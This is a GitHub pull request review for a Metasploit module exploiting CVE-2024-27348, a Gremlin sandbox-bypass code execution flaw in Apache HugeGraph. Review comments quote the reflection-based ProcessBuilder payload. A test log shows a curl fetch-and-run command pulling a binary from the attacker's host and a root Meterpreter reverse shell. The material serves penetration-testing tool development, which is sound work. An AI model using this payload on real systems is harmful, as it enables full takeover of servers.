Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Apache HugeGraph Gremlin RCE (CVE-2024-27348) #19348

Merged
merged 6 commits into from
Aug 14, 2024
Merged

Apache HugeGraph Gremlin RCE (CVE-2024-27348) #19348

merged 6 commits into from
Aug 14, 2024

Conversation

jheysel-r7
Copy link
Contributor

@jheysel-r7 jheysel-r7 commented Jul 29, 2024
edited by cgranleese-r7
Loading

This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve RCE through Gremlin, resulting in complete control over the server.

Vulnerable Target Setup

docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do: use linux/http/apache_hugegraph_gremlin_rce
  • Set the RHOST and LHOST options
  • Run the module
  • Receive a Meterpreter session as the root user.

dledda-r7
dledda-r7 reviewed Jul 30, 2024
View reviewed changes
modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
'Privileged' => true,
'Arch' => [ ARCH_CMD ],
'Targets' => [
[ 'Automatic Target', {}]
Copy link
Contributor

@dledda-r7 dledda-r7 Jul 30, 2024
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I was thinking if is possible and make sense to have also a Java Meterpreter target?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It's likely possible to have a Java Meterpreter target. If Apache HugeGraph was able to be installed on Windows I probably would have focused on a Java target which could have satisfied both Linux and Windows installations. Since it cannot be installed on Windows I decided to focus just on the ARCH_CMD for Linux based systems.

I think because the ARCH_CMD is able to deliver a Meterpreter session I'll leave it as is however if you or anyone else feels like it would be beneficial to add a ARCH_JAVA target I'd be happy to investigate further.

@cgranleese-r7 cgranleese-r7 self-assigned this Aug 1, 2024
@cgranleese-r7
Copy link
Contributor

Got a root session, everything seems to be working as expected 👍

msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > run

[*] Command to run on remote host: curl -so ./sfpgsQZIU http://<ip>:8080/VtUnMtEdkI5A0Lv6Y2zkFw; chmod +x ./sfpgsQZIU; ./sfpgsQZIU &
[*] Fetch handler listening on <ip>:8080
[*] HTTP server started
[*] Adding resource /VtUnMtEdkI5A0Lv6Y2zkFw
[*] Started reverse TCP handler on <ip>:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Apache HugeGraph version detected: 1.0.0
[*] 127.0.0.1:8080 - Running exploit with payload: cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Client <ip> requested /VtUnMtEdkI5A0Lv6Y2zkFw
[*] Sending payload to <ip> (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to <ip>
[*] Meterpreter session 1 opened (<ip>:4444 -> <ip>:63424) at 2024-08-01 10:11:31 +0100

meterpreter > pwd
/hugegraph
meterpreter > ls -la
Listing: /hugegraph
===================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  557    fil   2023-09-15 03:39:01 +0100  DISCLAIMER
100644/rw-r--r--  53393  fil   2023-09-15 03:39:01 +0100  LICENSE
100644/rw-r--r--  65881  fil   2023-09-15 03:39:01 +0100  NOTICE
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  bin
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  conf
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  ext
040755/rwxr-xr-x  20480  dir   2024-08-01 10:07:42 +0100  lib
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  licenses
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  logs
040755/rwxr-xr-x  4096   dir   2023-09-15 03:39:39 +0100  plugins
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  rocksdb-data
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  scripts
100755/rwxr-xr-x  250    fil   2024-08-01 10:11:31 +0100  sfpgsQZIU
040755/rwxr-xr-x  4096   dir   2024-08-01 10:07:42 +0100  swagger-ui

meterpreter > getuid
Server username: root
meterpreter >

cgranleese-r7
cgranleese-r7 reviewed Aug 1, 2024
View reviewed changes
documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md Outdated
## Verification Steps

1. Start msfconsole
1. Do: `use exploit/multi/http/apache_hugegraph_gremlin_rce`
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm assuming the module path was updated and some poin, as this seems to be outdated now:

Suggested change
1. Do: `use exploit/multi/http/apache_hugegraph_gremlin_rce`
1. Do: `use exploit/linux/http/apache_hugegraph_gremlin_rce`

image

documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md Outdated
### Apache HugeGraph 1.0.0 docker instance
```

msf6 exploit(multi/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If the module path does need updated, just adding a reminder to update this section as well.

jvoisin
jvoisin reviewed Aug 1, 2024
View reviewed changes
modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb Outdated
Comment on lines 63 to 67
if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
CheckCode::Appears("Apache HugeGraph version detected: #{version}")
else
CheckCode::Safe("Apache HugeGraph version detected: #{version}")
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
CheckCode::Appears("Apache HugeGraph version detected: #{version}")
else
CheckCode::Safe("Apache HugeGraph version detected: #{version}")
end
if Rex::Version.new(version).between?(Rex::Version.new('1.0.0'), Rex::Version.new('1.3.0'))
CheckCode::Appears("Apache HugeGraph version detected: #{version}")
end
CheckCode::Safe("Apache HugeGraph version detected: #{version}")

modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb Outdated
Comment on lines 85 to 86
data = {
'gremlin' => "Thread #{thread_name} = Thread.currentThread();Class #{class_name} = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field #{field_name} = #{class_name}.getDeclaredField(\"name\");#{field_name}.setAccessible(true);#{field_name}.set(#{thread_name}, \"#{thread_name}\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor #{constructor_name} = processBuilderClass.getConstructor(java.util.List.class);java.util.List #{command_name} = java.util.Arrays.asList(#{formatted_command});Object #{process_builder_name} = #{constructor_name}.newInstance(#{command_name});java.lang.reflect.Method #{start_method_name} = processBuilderClass.getMethod(\"start\");#{start_method_name}.invoke(#{process_builder_name});",
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think it would be nice to have the payload properly formatted, then join'ed in a single line before sending it.

@jheysel-r7
Copy link
Contributor Author

@msjenkins-r7 test this please

@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 14, 2024
@cgranleese-r7 cgranleese-r7 merged commit 36322ff into rapid7:master Aug 14, 2024
40 checks passed
@cgranleese-r7
Copy link
Contributor

Release Notes

Adds an Apache HugeGraph Server exploit for GHSA-29rc-vq7f-x335, which is a Remote Code Execution (RCE) vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve RCE through Gremlin, resulting in complete control over the server.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@dledda-r7 dledda-r7 dledda-r7 left review comments

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

@jvoisin jvoisin jvoisin left review comments

Assignees

@cgranleese-r7 cgranleese-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@jheysel-r7 @cgranleese-r7 @jvoisin @dledda-r7